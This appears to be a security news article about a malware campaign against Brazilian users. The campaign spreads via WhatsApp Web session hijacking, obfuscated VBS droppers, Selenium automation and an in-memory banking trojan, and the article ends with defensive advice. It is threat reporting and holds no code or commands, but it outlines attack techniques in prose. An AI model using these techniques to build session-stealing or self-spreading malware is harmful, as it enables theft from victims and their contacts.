Hackers Exploit WhatsApp to Distribute Malware and Harvest Sensitive Data
A sophisticated malware campaign has recently emerged, targeting Brazilian users by exploiting WhatsApp as its primary distribution channel. This attack leverages social engineering techniques, capitalizing on the trust users place in their contacts to disseminate banking trojans and harvest sensitive information.
Infection Mechanism
The campaign initiates with phishing emails containing ZIP-archived Visual Basic Script (VBS) files. These scripts employ advanced obfuscation methods to evade detection by security software. Once executed, the VBS script downloads and installs Python along with the Selenium WebDriver components, enabling automated interactions with WhatsApp Web.
Subsequently, the malware injects malicious JavaScript code into the victim’s browser session, accessing WhatsApp’s internal APIs to enumerate contacts and distribute additional payloads. This approach allows attackers to propagate the infection without requiring QR code authentication by hijacking existing logged-in sessions through the replication of browser cookies and local storage data.
Technical Breakdown
The infection process begins when victims receive phishing emails containing ZIP-archived VBS script files. These scripts utilize character encoding and XOR encryption to evade signature-based detection. The script employs a multi-layered obfuscation strategy, constructing strings character by character using Chr() functions and applying XOR operations with specific values to decode the actual malicious commands.
After deobfuscation, the script downloads two components: an MSI file and another VBS file. The downloaded VBS file contains identical obfuscation patterns and drops a batch script that installs Python, ChromeDriver, and Selenium packages. This automated setup creates the infrastructure needed for WhatsApp automation without requiring manual user intervention.
The Python script, named whats.py, takes control of the victim’s WhatsApp Web session by copying browser profile data, including cookies, local storage, and IndexedDB files, to a temporary directory. Using Selenium’s user-data-dir argument, the script launches Chrome with these copied credentials, effectively bypassing the QR code authentication step that would usually protect WhatsApp Web access.
Propagation and Persistence
Once the malware gains access to the victim’s WhatsApp Web session, it enumerates the contact list and sends malicious messages to all contacts, further propagating the infection. This method exploits the trust between contacts, increasing the likelihood of recipients opening the malicious attachments.
To maintain persistence on the infected system, the malware establishes registry modifications and continuously monitors active windows for banking-related keywords. When specific financial institutions or cryptocurrency wallet applications are detected, the malware decrypts and loads its banking trojan directly into memory, bypassing disk writes and making traditional file-based detection methods ineffective.
Implications and Recommendations
This campaign underscores the evolving tactics of cybercriminals who exploit widely used communication platforms like WhatsApp to distribute malware. By automating interactions with WhatsApp Web and leveraging existing user sessions, attackers can silently propagate malware and harvest sensitive information without raising immediate suspicion.
Users are advised to exercise caution when receiving unsolicited messages or emails containing attachments, even from known contacts. Implementing robust endpoint protection solutions, keeping software updated, and educating users about phishing tactics are crucial steps in mitigating such threats.
Organizations should also consider monitoring network traffic for unusual patterns that may indicate automated interactions with messaging platforms and implement security measures to detect and prevent unauthorized access to sensitive information.
